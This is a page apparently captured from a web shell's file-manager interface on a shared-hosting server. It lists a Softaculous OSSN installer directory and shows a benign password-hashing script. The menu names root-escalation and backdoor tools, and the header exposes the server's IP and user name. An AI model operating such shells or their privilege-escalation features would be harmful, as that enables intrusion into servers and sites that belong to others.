Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
ossn /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-09-04 11:05
php53
[ DIR ]
drwxr-xr-x
2026-09-04 11:05
php56
[ DIR ]
drwxr-xr-x
2026-09-04 11:05
php71
[ DIR ]
drwxr-xr-x
2026-09-04 11:05
php81
[ DIR ]
drwxr-xr-x
2026-09-04 11:05
php82
[ DIR ]
drwxr-xr-x
2026-09-04 11:05
.htaccess
2.11
KB
-rw-r--r--
2026-06-01 05:58
.user.ini
330
B
-rw-r--r--
2022-06-20 08:14
_index.php
59
B
-rw-r--r--
2021-12-23 06:54
changelog.txt
2.17
KB
-rw-r--r--
2026-07-28 02:50
clone.php
4.5
KB
-rw-r--r--
2026-07-28 08:26
edit.php
4.53
KB
-rw-r--r--
2026-07-28 08:26
edit.xml
433
B
-rw-r--r--
2025-12-31 06:59
extend.php
8.3
KB
-rw-r--r--
2026-07-28 08:26
fileindex.php
346
B
-rw-r--r--
2022-11-28 08:12
import.php
3.04
KB
-rw-r--r--
2026-07-28 08:26
info.xml
3.3
KB
-rw-r--r--
2026-07-28 02:50
install.js
924
B
-rw-r--r--
2021-12-23 06:54
install.php
12.18
KB
-rw-r--r--
2026-07-28 08:26
install.xml
1.33
KB
-rw-r--r--
2021-12-23 06:54
md5
2.5
KB
-rw-r--r--
2026-07-28 08:26
notes.txt
578
B
-rw-r--r--
2025-01-30 04:24
soft.htaccess
127
B
-rw-r--r--
2021-12-23 06:54
update_pass.php
508
B
-rw-r--r--
2025-10-06 02:57
upgrade.php
4.85
KB
-rw-r--r--
2026-07-28 08:26
upgrade.xml
382
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors */ @unlink('update_pass.php'); if(!defined('PASSWORD_BCRYPT')){ define('PASSWORD_BCRYPT', 1); } define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); $resp = password_hash('[[admin_pass]]'.'[[salt]]', PASSWORD_DEFAULT); echo '<update_pass>'.$resp.'</update_pass>'; ?>